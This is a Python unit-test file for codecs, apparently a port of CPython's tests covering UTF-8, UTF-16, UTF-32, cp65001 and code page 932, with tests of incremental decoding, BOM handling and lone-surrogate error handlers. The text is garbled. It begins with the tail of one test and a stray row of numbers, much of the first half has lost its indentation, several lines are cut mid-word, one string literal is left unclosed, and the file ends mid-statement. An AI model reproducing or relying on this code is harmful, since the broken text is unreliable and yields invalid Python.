        decoded = codecs.code_page_decode(932, b'\x82', 'strict', False)
        self.assertEqual(decoded, ('', 0))
        decoded = codecs.code_page_decode(932,
                                          b'\xe9\x80\xe9', 'strict',
                                          False)
        self.assertEqual(decoded, ('\u9a3e', 2))
        decoded = codecs.code_page_decode(932,
                                          b'\xe9\x80\xe9\x80', 'strict',
                                          False)
        self.assertEqual(decoded, ('\u9a3e\u9a3e', 4))
        decoded = codecs.code_page_decode(932,
                                          b'abc', 'strict',
                                          False)
        self.assertEqual(decoded, ('abc', 3))
# Run the whole suite when this module is executed as a script.
if __name__ == "__main__":
    yp_unittest.main()
| 38.399321 | 113 | 0.544382 | from yp import *
import codecs
import contextlib
import io
import locale
import sys
from yp_test import yp_unittest
import warnings
import encodings
from yp_test import support
_str = str
def bytes( *args, **kwargs ): raise NotImplementedError( "convert script to yp_bytes here" )
def bytearray( *args, **kwargs ): raise NotImplementedError( "convert script to yp_bytearray here" )
def str( *args, **kwargs ): raise NotImplementedError( "convert script to yp_str here" )
if sys.platform == 'win32':
VISTA_OR_LATER = (sys.getwindowsversion().major >= 6)
else:
VISTA_OR_LATER = False
try:
import ctypes
except ImportError:
ctypes = None
SIZEOF_WCHAR_T = -1
else:
SIZEOF_WCHAR_T = ctypes.sizeof(ctypes.c_wchar)
def coding_checker(self, coder):
def check(input, expect):
self.assertEqual(coder(input), (expect, len(input)))
return check
class Queue(object):
def __init__(self, buffer):
self._buffer = buffer
def write(self, chars):
self._buffer += chars
def read(self, size=-1):
if size<0:
s = self._buffer
self._buffer = self._buffer[:0]
return s
else:
s = self._buffer[:size]
self._buffer = self._buffer[size:]
return s
class MixInCheckStateHandling:
def check_state_handling_decode(self, encoding, u, s):
for i in range(len(s)+1):
d = codecs.getincrementaldecoder(encoding)()
part1 = d.decode(s[:i])
state = d.getstate()
self.assertIsInstance(state[1], int)
if not state[1]:
d.setstate((state[0][:0], 0))
self.assertTrue(not d.decode(state[0]))
self.assertEqual(state, d.getstate())
d = codecs.getincrementaldecoder(encoding)()
d.setstate(state)
part2 = d.decode(s[i:], True)
self.assertEqual(u, part1+part2)
def check_state_handling_encode(self, encoding, u, s):
for i in range(len(u)+1):
d = codecs.getincrementalencoder(encoding)()
part1 = d.encode(u[:i])
state = d.getstate()
d = codecs.getincrementalencoder(encoding)()
d.setstate(state)
part2 = d.encode(u[i:], True)
self.assertEqual(s, part1+part2)
@yp_unittest.skip_str_codecs
class ReadTest(MixInCheckStateHandling):
def check_partial(self, input, partialresults):
q = Queue(b"")
r = codecs.getreader(self.encoding)(q)
result = ""
for (c, partialresult) in zip(input.encode(self.encoding), partialresults):
q.write(bytes([c]))
result += r.read()
self.assertEqual(result, partialresult)
self.assertEqual(r.read(), "")
self.assertEqual(r.bytebuffer, b"")
# do the check again, this time using a incremental decoder
d = codecs.getincrementaldecoder(self.encoding)()
result = ""
for (c, partialresult) in zip(input.encode(self.encoding), partialresults):
result += d.decode(bytes([c]))
self.assertEqual(result, partialresult)
# check that there's nothing left in the buffers
self.assertEqual(d.decode(b"", True), "")
self.assertEqual(d.buffer, b"")
d.reset()
result = ""
for (c, partialresult) in zip(input.encode(self.encoding), partialresults):
result += d.decode(bytes([c]))
self.assertEqual(result, partialresult)
self.assertEqual(d.decode(b"", True), "")
self.assertEqual(d.buffer, b"")
# check iterdecode()
encoded = input.encode(self.encoding)
self.assertEqual(
input,
"".join(codecs.iterdecode([bytes([c]) for c in encoded], self.encoding))
)
def test_readline(self):
def getreader(input):
stream = io.BytesIO(input.encode(self.encoding))
return codecs.getreader(self.encoding)(stream)
def readalllines(input, keepends=True, size=None):
reader = getreader(input)
lines = []
while True:
line = reader.readline(size=size, keepends=keepends)
if not line:
break
lines.append(line)
return "|".join(lines)
s = "foo\nbar\r\nbaz\rspam\u2028eggs"
sexpected = "foo\n|bar\r\n|baz\r|spam\u2028|eggs"
sexpectednoends = "foo|bar|baz|spam|eggs"
self.assertEqual(readalllines(s, True), sexpected)
self.assertEqual(readalllines(s, False), sexpectednoends)
self.assertEqual(readalllines(s, True, 10), sexpected)
self.assertEqual(readalllines(s, False, 10), sexpectednoends)
lineends = ("\n", "\r\n", "\r", "\u2028")
# Test long lines (multiple calls to read() in readline())
vw = []
vwo = []
for (i, lineend) in enumerate(lineends):
vw.append((i*200+200)*"\u3042" + lineend)
vwo.append((i*200+200)*"\u3042")
self.assertEqual(readalllines("".join(vw), True), "|".join(vw))
self.assertEqual(readalllines("".join(vw), False), "|".join(vwo))
# Test lines where the first read might end with \r, so the
# reader has to look ahead whether this is a lone \r or a \r\n
for size in range(80):
for lineend in lineends:
s = 10*(size*"a" + lineend + "xxx\n")
reader = getreader(s)
for i in range(10):
self.assertEqual(
reader.readline(keepends=True),
size*"a" + lineend,
)
self.assertEqual(
reader.readline(keepends=True),
"xxx\n",
)
reader = getreader(s)
for i in range(10):
self.assertEqual(
reader.readline(keepends=False),
size*"a",
)
self.assertEqual(
reader.readline(keepends=False),
"xxx",
)
def test_mixed_readline_and_read(self):
lines = ["Humpty Dumpty sat on a wall,\n",
"Humpty Dumpty had a great fall.\r\n",
"All the king's horses and all the king's men\r",
"Couldn't put Humpty together again."]
data = ''.join(lines)
def getreader():
stream = io.BytesIO(data.encode(self.encoding))
return codecs.getreader(self.encoding)(stream)
ertEqual(f.readline(), lines[0])
self.assertEqual(f.read(), ''.join(lines[1:]))
self.assertEqual(f.read(), '')
al(f.readline(), lines[0])
self.assertEqual(f.readlines(), lines[1:])
self.assertEqual(f.read(), '')
f = getreader()
self.assertEqual(f.read(size=40, chars=5), data[:5])
self.assertEqual(f.read(), data[5:])
self.assertEqual(f.read(), '')
tEqual(f.read(size=40, chars=5), data[:5])
self.assertEqual(f.readlines(), [lines[0][5:]] + lines[1:])
self.assertEqual(f.read(), '')
def test_bug1175396(self):
s = [
'<%!--===================================================\r\n',
' BLOG index page: show recent articles,\r\n',
' today\'s articles, or articles of a specific date.\r\n',
'========================================================--%>\r\n',
'<%@inputencoding="ISO-8859-1"%>\r\n',
'<%@pagetemplate=TEMPLATE.y%>\r\n',
'<%@import=import frog.util, frog%>\r\n',
'<%@import=import frog.objects%>\r\n',
'<%@import=from frog.storageerrors import StorageError%>\r\n',
'<%\r\n',
'\r\n',
'import logging\r\n',
'log=logging.getLogger("Snakelets.logger")\r\n',
'\r\n',
'\r\n',
'user=self.SessionCtx.user\r\n',
'storageEngine=self.SessionCtx.storageEngine\r\n',
'\r\n',
'\r\n',
'def readArticlesFromDate(date, count=None):\r\n',
' entryids=storageEngine.listBlogEntries(date)\r\n',
' entryids.reverse()
' if count:\r\n',
' entryids=entryids[:count]\r\n',
' try:\r\n',
' return [ frog.objects.BlogEntry.load(storageEngine, date, Id) for Id in entryids ]\r\n',
' except StorageError,x:\r\n',
' log.error("Error loading articles: "+str(x))\r\n',
' self.abort("cannot load articles")\r\n',
'\r\n',
'showdate=None\r\n',
'\r\n',
'arg=self.Request.getArg()\r\n',
'if arg=="today":\r\n',
'
' self.write("<h2>Today\'s articles</h2>")\r\n',
' showdate = frog.util.isodatestr() \r\n',
' entries = readArticlesFromDate(showdate)\r\n',
'elif arg=="active":\r\n',
'
' self.Yredirect("active.y")\r\n',
'elif arg=="login":\r\n',
'
' self.Yredirect("login.y")\r\n',
'elif arg=="date":\r\n',
'
' showdate = self.Request.getParameter("date")\r\n',
' self.write("<h2>Articles written on %s</h2>"% frog.util.mediumdatestr(showdate))\r\n',
' entries = readArticlesFromDate(showdate)\r\n',
'else:\r\n',
'
' self.write("<h2>Recent articles</h2>")\r\n',
' dates=storageEngine.listBlogEntryDates()\r\n',
' if dates:\r\n',
' entries=[]\r\n',
' SHOWAMOUNT=10\r\n',
' for showdate in dates:\r\n',
' entries.extend( readArticlesFromDate(showdate, SHOWAMOUNT-len(entries)) )\r\n',
' if len(entries)>=SHOWAMOUNT:\r\n',
' break\r\n',
' \r\n',
]
stream = io.BytesIO("".join(s).encode(self.encoding))
reader = codecs.getreader(self.encoding)(stream)
for (i, line) in enumerate(reader):
self.assertEqual(line, s[i])
def test_readlinequeue(self):
q = Queue(b"")
writer = codecs.getwriter(self.encoding)(q)
reader = codecs.getreader(self.encoding)(q)
# No lineends
writer.write("foo\r")
self.assertEqual(reader.readline(keepends=False), "foo")
writer.write("\nbar\r")
self.assertEqual(reader.readline(keepends=False), "")
self.assertEqual(reader.readline(keepends=False), "bar")
writer.write("baz")
self.assertEqual(reader.readline(keepends=False), "baz")
self.assertEqual(reader.readline(keepends=False), "")
# Lineends
writer.write("foo\r")
self.assertEqual(reader.readline(keepends=True), "foo\r")
writer.write("\nbar\r")
self.assertEqual(reader.readline(keepends=True), "\n")
self.assertEqual(reader.readline(keepends=True), "bar\r")
writer.write("baz")
self.assertEqual(reader.readline(keepends=True), "baz")
self.assertEqual(reader.readline(keepends=True), "")
writer.write("foo\r\n")
self.assertEqual(reader.readline(keepends=True), "foo\r\n")
def test_bug1098990_a(self):
s1 = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy\r\n"
s2 = "offending line: ladfj askldfj klasdj fskla dfzaskdj fasklfj laskd fjasklfzzzzaa%whereisthis!!!\r\n"
s3 = "next line.\r\n"
s = (s1+s2+s3).encode(self.encoding)
stream = io.BytesIO(s)
reader = codecs.getreader(self.encoding)(stream)
self.assertEqual(reader.readline(), s1)
self.assertEqual(reader.readline(), s2)
self.assertEqual(reader.readline(), s3)
self.assertEqual(reader.readline(), "")
def test_bug1098990_b(self):
s1 = "aaaaaaaaaaaaaaaaaaaaaaaa\r\n"
s2 = "bbbbbbbbbbbbbbbbbbbbbbbb\r\n"
s3 = "stillokay:bbbbxx\r\n"
s4 = "broken!!!!badbad\r\n"
s5 = "againokay.\r\n"
s = (s1+s2+s3+s4+s5).encode(self.encoding)
stream = io.BytesIO(s)
reader = codecs.getreader(self.encoding)(stream)
self.assertEqual(reader.readline(), s1)
self.assertEqual(reader.readline(), s2)
self.assertEqual(reader.readline(), s3)
self.assertEqual(reader.readline(), s4)
self.assertEqual(reader.readline(), s5)
self.assertEqual(reader.readline(), "")
ill_formed_sequence_replace = "\ufffd"
def test_lone_surrogates(self):
    # Unpaired surrogates must be rejected by a strict encode, and each
    # standard error handler must produce its documented substitute.
    self.assertRaises(UnicodeEncodeError, "\ud800".encode, self.encoding)
    self.assertEqual("[\uDC80]".encode(self.encoding, "backslashreplace"),
                     "[\\udc80]".encode(self.encoding))
    self.assertEqual("[\uDC80]".encode(self.encoding, "xmlcharrefreplace"),
                     "[&#56448;]".encode(self.encoding))
    self.assertEqual("[\uDC80]".encode(self.encoding, "ignore"),
                     "[]".encode(self.encoding))
    self.assertEqual("[\uDC80]".encode(self.encoding, "replace"),
                     "[?]".encode(self.encoding))

    # Embed self.ill_formed_sequence between well-formed characters,
    # taking care that any BOM appears only once, at the very start.
    bom = "".encode(self.encoding)
    for before, after in [("\U00010fff", "A"), ("[", "]"),
                          ("A", "\U00010fff")]:
        before_sequence = before.encode(self.encoding)[len(bom):]
        after_sequence = after.encode(self.encoding)[len(bom):]
        test_string = before + "\uDC80" + after
        test_sequence = (bom + before_sequence +
                         self.ill_formed_sequence + after_sequence)
        # Strict decoding must reject the ill-formed bytes.
        self.assertRaises(UnicodeDecodeError, test_sequence.decode,
                          self.encoding)
        # "surrogatepass" round-trips the lone surrogate both ways.
        self.assertEqual(test_string.encode(self.encoding,
                                            "surrogatepass"),
                         test_sequence)
        self.assertEqual(test_sequence.decode(self.encoding,
                                              "surrogatepass"),
                         test_string)
        self.assertEqual(test_sequence.decode(self.encoding, "ignore"),
                         before + after)
        self.assertEqual(test_sequence.decode(self.encoding, "replace"),
                         before + self.ill_formed_sequence_replace + after)
@yp_unittest.skip_str_codecs
class UTF32Test(ReadTest, yp_unittest.TestCase):
    """Tests for the BOM-sniffing "utf-32" codec."""
    encoding = "utf-32"
    # Encoding of a lone low surrogate (U+DC80) in native byte order;
    # ill-formed on decode.
    if sys.byteorder == 'little':
        ill_formed_sequence = b"\x80\xdc\x00\x00"
    else:
        ill_formed_sequence = b"\x00\x00\xdc\x80"

    # "spamspam" encoded with a single leading BOM, both byte orders.
    spamle = (b'\xff\xfe\x00\x00'
              b's\x00\x00\x00p\x00\x00\x00a\x00\x00\x00m\x00\x00\x00'
              b's\x00\x00\x00p\x00\x00\x00a\x00\x00\x00m\x00\x00\x00')
    spambe = (b'\x00\x00\xfe\xff'
              b'\x00\x00\x00s\x00\x00\x00p\x00\x00\x00a\x00\x00\x00m'
              b'\x00\x00\x00s\x00\x00\x00p\x00\x00\x00a\x00\x00\x00m')

    def test_only_one_bom(self):
        _,_,reader,writer = codecs.lookup(self.encoding)
        # encode some stream
        s = io.BytesIO()
        f = writer(s)
        f.write("spam")
        f.write("spam")
        d = s.getvalue()
        # check whether there is exactly one BOM in it
        self.assertTrue(d == self.spamle or d == self.spambe)
        # try to read it back
        s = io.BytesIO(d)
        f = reader(s)
        self.assertEqual(f.read(), "spamspam")

    def test_badbom(self):
        # A stream starting with neither BOM must fail to decode.
        s = io.BytesIO(4*b"\xff")
        f = codecs.getreader(self.encoding)(s)
        self.assertRaises(UnicodeError, f.read)

        s = io.BytesIO(8*b"\xff")
        f = codecs.getreader(self.encoding)(s)
        self.assertRaises(UnicodeError, f.read)

    def test_partial(self):
        # Expected decoder output after each additional input byte; a
        # character only appears once all four of its bytes (and, first,
        # the 4-byte BOM) have been consumed.
        self.check_partial(
            "\x00\xff\u0100\uffff\U00010000",
            [
                "", # first byte of BOM read
                "", # second byte of BOM read
                "", # third byte of BOM read
                "", # fourth byte of BOM read => byteorder known
                "",
                "",
                "",
                "\x00",
                "\x00",
                "\x00",
                "\x00",
                "\x00\xff",
                "\x00\xff",
                "\x00\xff",
                "\x00\xff",
                "\x00\xff\u0100",
                "\x00\xff\u0100",
                "\x00\xff\u0100",
                "\x00\xff\u0100",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff\U00010000",
            ]
        )

    def test_handlers(self):
        # A truncated unit is replaced or ignored per the error handler.
        self.assertEqual(('\ufffd', 1),
                         codecs.utf_32_decode(b'\x01', 'replace', True))
        self.assertEqual(('', 1),
                         codecs.utf_32_decode(b'\x01', 'ignore', True))

    def test_errors(self):
        self.assertRaises(UnicodeDecodeError, codecs.utf_32_decode,
                          b"\xff", "strict", True)

    def test_decoder_state(self):
        # Decoder state (byte order learned from the BOM) must survive
        # getstate()/setstate() round-trips.
        self.check_state_handling_decode(self.encoding,
                                         "spamspam", self.spamle)
        self.check_state_handling_decode(self.encoding,
                                         "spamspam", self.spambe)

    def test_issue8941(self):
        # Issue #8941: insufficient result allocation when decoding into
        # surrogate pairs on UCS-2 builds.
        encoded_le = b'\xff\xfe\x00\x00' + b'\x00\x00\x01\x00' * 1024
        self.assertEqual('\U00010000' * 1024,
                         codecs.utf_32_decode(encoded_le)[0])
        encoded_be = b'\x00\x00\xfe\xff' + b'\x00\x01\x00\x00' * 1024
        self.assertEqual('\U00010000' * 1024,
                         codecs.utf_32_decode(encoded_be)[0])
@yp_unittest.skip_str_codecs
class UTF32LETest(ReadTest, yp_unittest.TestCase):
    """Tests for the fixed-order "utf-32-le" codec (no BOM handling)."""
    encoding = "utf-32-le"
    # Lone low surrogate U+DC80, little-endian; ill-formed on decode.
    ill_formed_sequence = b"\x80\xdc\x00\x00"

    def test_partial(self):
        # No BOM: each character appears as soon as its 4th byte is read.
        self.check_partial(
            "\x00\xff\u0100\uffff\U00010000",
            [
                "",
                "",
                "",
                "\x00",
                "\x00",
                "\x00",
                "\x00",
                "\x00\xff",
                "\x00\xff",
                "\x00\xff",
                "\x00\xff",
                "\x00\xff\u0100",
                "\x00\xff\u0100",
                "\x00\xff\u0100",
                "\x00\xff\u0100",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff\U00010000",
            ]
        )

    def test_simple(self):
        # A non-BMP code point encodes as four little-endian bytes, no BOM.
        self.assertEqual("\U00010203".encode(self.encoding), b"\x03\x02\x01\x00")

    def test_errors(self):
        self.assertRaises(UnicodeDecodeError, codecs.utf_32_le_decode,
                          b"\xff", "strict", True)

    def test_issue8941(self):
        # Issue #8941: insufficient result allocation when decoding into
        # surrogate pairs on UCS-2 builds.
        encoded = b'\x00\x00\x01\x00' * 1024
        self.assertEqual('\U00010000' * 1024,
                         codecs.utf_32_le_decode(encoded)[0])
@yp_unittest.skip_str_codecs
class UTF32BETest(ReadTest, yp_unittest.TestCase):
    """Tests for the fixed-order "utf-32-be" codec (no BOM handling)."""
    encoding = "utf-32-be"
    # Lone low surrogate U+DC80, big-endian; ill-formed on decode.
    ill_formed_sequence = b"\x00\x00\xdc\x80"

    def test_partial(self):
        # No BOM: each character appears as soon as its 4th byte is read.
        self.check_partial(
            "\x00\xff\u0100\uffff\U00010000",
            [
                "",
                "",
                "",
                "\x00",
                "\x00",
                "\x00",
                "\x00",
                "\x00\xff",
                "\x00\xff",
                "\x00\xff",
                "\x00\xff",
                "\x00\xff\u0100",
                "\x00\xff\u0100",
                "\x00\xff\u0100",
                "\x00\xff\u0100",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff\U00010000",
            ]
        )

    def test_simple(self):
        # A non-BMP code point encodes as four big-endian bytes, no BOM.
        self.assertEqual("\U00010203".encode(self.encoding), b"\x00\x01\x02\x03")

    def test_errors(self):
        self.assertRaises(UnicodeDecodeError, codecs.utf_32_be_decode,
                          b"\xff", "strict", True)

    def test_issue8941(self):
        # Issue #8941: insufficient result allocation when decoding into
        # surrogate pairs on UCS-2 builds.
        encoded = b'\x00\x01\x00\x00' * 1024
        self.assertEqual('\U00010000' * 1024,
                         codecs.utf_32_be_decode(encoded)[0])
@yp_unittest.skip_str_codecs
class UTF16Test(ReadTest, yp_unittest.TestCase):
    """Tests for the BOM-sniffing "utf-16" codec."""
    encoding = "utf-16"
    # Encoding of a lone low surrogate (U+DC80) in native byte order;
    # ill-formed on decode.
    if sys.byteorder == 'little':
        ill_formed_sequence = b"\x80\xdc"
    else:
        ill_formed_sequence = b"\xdc\x80"

    # "spamspam" encoded with a single leading BOM, both byte orders.
    spamle = b'\xff\xfes\x00p\x00a\x00m\x00s\x00p\x00a\x00m\x00'
    spambe = b'\xfe\xff\x00s\x00p\x00a\x00m\x00s\x00p\x00a\x00m'

    def test_only_one_bom(self):
        _,_,reader,writer = codecs.lookup(self.encoding)
        # encode some stream
        s = io.BytesIO()
        f = writer(s)
        f.write("spam")
        f.write("spam")
        d = s.getvalue()
        # check whether there is exactly one BOM in it
        self.assertTrue(d == self.spamle or d == self.spambe)
        # try to read it back
        s = io.BytesIO(d)
        f = reader(s)
        self.assertEqual(f.read(), "spamspam")

    def test_badbom(self):
        # A stream starting with neither BOM must fail to decode.
        s = io.BytesIO(b"\xff\xff")
        f = codecs.getreader(self.encoding)(s)
        self.assertRaises(UnicodeError, f.read)

        s = io.BytesIO(b"\xff\xff\xff\xff")
        f = codecs.getreader(self.encoding)(s)
        self.assertRaises(UnicodeError, f.read)

    def test_partial(self):
        # Expected decoder output after each additional input byte; the
        # non-BMP character needs all four bytes of its surrogate pair.
        self.check_partial(
            "\x00\xff\u0100\uffff\U00010000",
            [
                "", # first byte of BOM read
                "", # second byte of BOM read => byteorder known
                "",
                "\x00",
                "\x00",
                "\x00\xff",
                "\x00\xff",
                "\x00\xff\u0100",
                "\x00\xff\u0100",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff\U00010000",
            ]
        )

    def test_handlers(self):
        # A truncated unit is replaced or ignored per the error handler.
        self.assertEqual(('\ufffd', 1),
                         codecs.utf_16_decode(b'\x01', 'replace', True))
        self.assertEqual(('', 1),
                         codecs.utf_16_decode(b'\x01', 'ignore', True))

    def test_errors(self):
        self.assertRaises(UnicodeDecodeError, codecs.utf_16_decode,
                          b"\xff", "strict", True)

    def test_decoder_state(self):
        # Decoder state (byte order learned from the BOM) must survive
        # getstate()/setstate() round-trips.
        self.check_state_handling_decode(self.encoding,
                                         "spamspam", self.spamle)
        self.check_state_handling_decode(self.encoding,
                                         "spamspam", self.spambe)

    def test_bug691291(self):
        # Files are always opened in binary mode, even if no binary mode was
        # specified. This means that no automatic conversion of '\n' is done
        # on reading and writing.
        s1 = 'Hello\r\nworld\r\n'

        s = s1.encode(self.encoding)
        self.addCleanup(support.unlink, support.TESTFN)
        with open(support.TESTFN, 'wb') as fp:
            fp.write(s)
        with support.check_warnings(('', DeprecationWarning)):
            reader = codecs.open(support.TESTFN, 'U', encoding=self.encoding)
        with reader:
            self.assertEqual(reader.read(), s1)
@yp_unittest.skip_str_codecs
class UTF16LETest(ReadTest, yp_unittest.TestCase):
    """Tests for the fixed-order "utf-16-le" codec (no BOM handling)."""
    encoding = "utf-16-le"
    # Lone low surrogate U+DC80, little-endian; ill-formed on decode.
    ill_formed_sequence = b"\x80\xdc"

    def test_partial(self):
        # No BOM: BMP characters appear after their 2nd byte, the
        # non-BMP character after all 4 bytes of its surrogate pair.
        self.check_partial(
            "\x00\xff\u0100\uffff\U00010000",
            [
                "",
                "\x00",
                "\x00",
                "\x00\xff",
                "\x00\xff",
                "\x00\xff\u0100",
                "\x00\xff\u0100",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff\U00010000",
            ]
        )

    def test_errors(self):
        # (raw bytes, expected "replace" output); strict decoding of each
        # must raise.  Covers truncated units and unpaired surrogates.
        tests = [
            (b'\xff', '\ufffd'),
            (b'A\x00Z', 'A\ufffd'),
            (b'A\x00B\x00C\x00D\x00Z', 'ABCD\ufffd'),
            (b'\x00\xd8', '\ufffd'),
            (b'\x00\xd8A', '\ufffd'),
            (b'\x00\xd8A\x00', '\ufffdA'),
            (b'\x00\xdcA\x00', '\ufffdA'),
        ]
        for raw, expected in tests:
            self.assertRaises(UnicodeDecodeError, codecs.utf_16_le_decode,
                              raw, 'strict', True)
            self.assertEqual(raw.decode('utf-16le', 'replace'), expected)

    def test_nonbmp(self):
        # Non-BMP code point round-trips through a surrogate pair.
        self.assertEqual("\U00010203".encode(self.encoding),
                         b'\x00\xd8\x03\xde')
        self.assertEqual(b'\x00\xd8\x03\xde'.decode(self.encoding),
                         "\U00010203")
@yp_unittest.skip_str_codecs
class UTF16BETest(ReadTest, yp_unittest.TestCase):
    """Tests for the fixed-order "utf-16-be" codec (no BOM handling)."""
    encoding = "utf-16-be"
    # Lone low surrogate U+DC80, big-endian; ill-formed on decode.
    ill_formed_sequence = b"\xdc\x80"

    def test_partial(self):
        # No BOM: BMP characters appear after their 2nd byte, the
        # non-BMP character after all 4 bytes of its surrogate pair.
        self.check_partial(
            "\x00\xff\u0100\uffff\U00010000",
            [
                "",
                "\x00",
                "\x00",
                "\x00\xff",
                "\x00\xff",
                "\x00\xff\u0100",
                "\x00\xff\u0100",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff",
                "\x00\xff\u0100\uffff\U00010000",
            ]
        )

    def test_errors(self):
        # (raw bytes, expected "replace" output); strict decoding of each
        # must raise.  Covers truncated units and unpaired surrogates.
        tests = [
            (b'\xff', '\ufffd'),
            (b'\x00A\xff', 'A\ufffd'),
            (b'\x00A\x00B\x00C\x00DZ', 'ABCD\ufffd'),
            (b'\xd8\x00', '\ufffd'),
            (b'\xd8\x00\xdc', '\ufffd'),
            (b'\xd8\x00\x00A', '\ufffdA'),
            (b'\xdc\x00\x00A', '\ufffdA'),
        ]
        for raw, expected in tests:
            self.assertRaises(UnicodeDecodeError, codecs.utf_16_be_decode,
                              raw, 'strict', True)
            self.assertEqual(raw.decode('utf-16be', 'replace'), expected)

    def test_nonbmp(self):
        # Non-BMP code point round-trips through a surrogate pair.
        self.assertEqual("\U00010203".encode(self.encoding),
                         b'\xd8\x00\xde\x03')
        self.assertEqual(b'\xd8\x00\xde\x03'.decode(self.encoding),
                         "\U00010203")
class UTF8Test(ReadTest, yp_unittest.TestCase):
    """Tests for the "utf-8" codec."""
    encoding = "utf-8"
    # UTF-8 encoding of lone surrogate U+DC80; ill-formed on decode.
    ill_formed_sequence = b"\xed\xb2\x80"
    # Each of the three ill-formed bytes is replaced individually.
    ill_formed_sequence_replace = "\ufffd" * 3

    def test_partial(self):
        # Expected decoder output after each additional input byte; a
        # multi-byte character appears only once complete.
        self.check_partial(
            "\x00\xff\u07ff\u0800\uffff\U00010000",
            [
                "\x00",
                "\x00",
                "\x00\xff",
                "\x00\xff",
                "\x00\xff\u07ff",
                "\x00\xff\u07ff",
                "\x00\xff\u07ff",
                "\x00\xff\u07ff\u0800",
                "\x00\xff\u07ff\u0800",
                "\x00\xff\u07ff\u0800",
                "\x00\xff\u07ff\u0800\uffff",
                "\x00\xff\u07ff\u0800\uffff",
                "\x00\xff\u07ff\u0800\uffff",
                "\x00\xff\u07ff\u0800\uffff",
                "\x00\xff\u07ff\u0800\uffff\U00010000",
            ]
        )

    def test_decoder_state(self):
        # Incremental decoder state must survive getstate()/setstate().
        u = "\x00\x7f\x80\xff\u0100\u07ff\u0800\uffff\U0010ffff"
        self.check_state_handling_decode(self.encoding,
                                         u, u.encode(self.encoding))

    def test_lone_surrogates(self):
        super().test_lone_surrogates()
        # not sure if this is making sense for
        # UTF-16 and UTF-32
        self.assertEqual("[\uDC80]".encode('utf-8', "surrogateescape"),
                         b'[\x80]')

    def test_surrogatepass_handler(self):
        # "surrogatepass" encodes/decodes lone surrogates as their
        # CESU-8-style three-byte sequences.
        self.assertEqual("abc\ud800def".encode("utf-8", "surrogatepass"),
                         b"abc\xed\xa0\x80def")
        self.assertEqual(b"abc\xed\xa0\x80def".decode("utf-8", "surrogatepass"),
                         "abc\ud800def")
        self.assertEqual("\U00010fff\uD800".encode("utf-8", "surrogatepass"),
                         b"\xf0\x90\xbf\xbf\xed\xa0\x80")
        self.assertEqual(b"\xf0\x90\xbf\xbf\xed\xa0\x80".decode("utf-8", "surrogatepass"),
                         "\U00010fff\uD800")
        self.assertTrue(codecs.lookup_error("surrogatepass"))
        # Truncated or malformed surrogate sequences still raise.
        with self.assertRaises(UnicodeDecodeError):
            b"abc\xed\xa0".decode("utf-8", "surrogatepass")
        with self.assertRaises(UnicodeDecodeError):
            b"abc\xed\xa0z".decode("utf-8", "surrogatepass")
@yp_unittest.skipUnless(sys.platform == 'win32',
                        'cp65001 is a Windows-only codec')
@yp_unittest.skip_str_codecs
class CP65001Test(ReadTest, yp_unittest.TestCase):
    """Tests for the Windows-only cp65001 codec (the Win32 UTF-8 code page).

    Pre-Vista Windows encoded/decoded lone surrogates without error,
    hence the VISTA_OR_LATER variants in the expected results.
    """
    encoding = "cp65001"

    def test_encode(self):
        # (text, error handler, expected bytes); expected None means the
        # encode must raise UnicodeEncodeError.
        tests = [
            ('abc', 'strict', b'abc'),
            ('\xe9\u20ac', 'strict', b'\xc3\xa9\xe2\x82\xac'),
            ('\U0010ffff', 'strict', b'\xf4\x8f\xbf\xbf'),
        ]
        if VISTA_OR_LATER:
            tests.extend((
                ('\udc80', 'strict', None),
                ('\udc80', 'ignore', b''),
                ('\udc80', 'replace', b'?'),
                ('\udc80', 'backslashreplace', b'\\udc80'),
                ('\udc80', 'surrogatepass', b'\xed\xb2\x80'),
            ))
        else:
            tests.append(('\udc80', 'strict', b'\xed\xb2\x80'))
        for text, errors, expected in tests:
            if expected is not None:
                try:
                    encoded = text.encode('cp65001', errors)
                except UnicodeEncodeError as err:
                    self.fail('Unable to encode %a to cp65001 with '
                              'errors=%r: %s' % (text, errors, err))
                self.assertEqual(encoded, expected,
                                 '%a.encode("cp65001", %r)=%a != %a'
                                 % (text, errors, encoded, expected))
            else:
                self.assertRaises(UnicodeEncodeError,
                                  text.encode, "cp65001", errors)

    def test_decode(self):
        # (raw bytes, error handler, expected text); expected None means
        # the decode must raise UnicodeDecodeError.
        tests = [
            (b'abc', 'strict', 'abc'),
            (b'\xc3\xa9\xe2\x82\xac', 'strict', '\xe9\u20ac'),
            (b'\xf4\x8f\xbf\xbf', 'strict', '\U0010ffff'),
            (b'\xef\xbf\xbd', 'strict', '\ufffd'),
            (b'[\xc3\xa9]', 'strict', '[\xe9]'),
            # invalid bytes
            (b'[\xff]', 'strict', None),
            (b'[\xff]', 'ignore', '[]'),
            (b'[\xff]', 'replace', '[\ufffd]'),
            (b'[\xff]', 'surrogateescape', '[\udcff]'),
        ]
        if VISTA_OR_LATER:
            tests.extend((
                (b'[\xed\xb2\x80]', 'strict', None),
                (b'[\xed\xb2\x80]', 'ignore', '[]'),
                (b'[\xed\xb2\x80]', 'replace', '[\ufffd\ufffd\ufffd]'),
            ))
        else:
            tests.extend((
                (b'[\xed\xb2\x80]', 'strict', '[\udc80]'),
            ))
        for raw, errors, expected in tests:
            if expected is not None:
                try:
                    decoded = raw.decode('cp65001', errors)
                except UnicodeDecodeError as err:
                    self.fail('Unable to decode %a from cp65001 with '
                              'errors=%r: %s' % (raw, errors, err))
                self.assertEqual(decoded, expected,
                                 '%a.decode("cp65001", %r)=%a != %a'
                                 % (raw, errors, decoded, expected))
            else:
                self.assertRaises(UnicodeDecodeError,
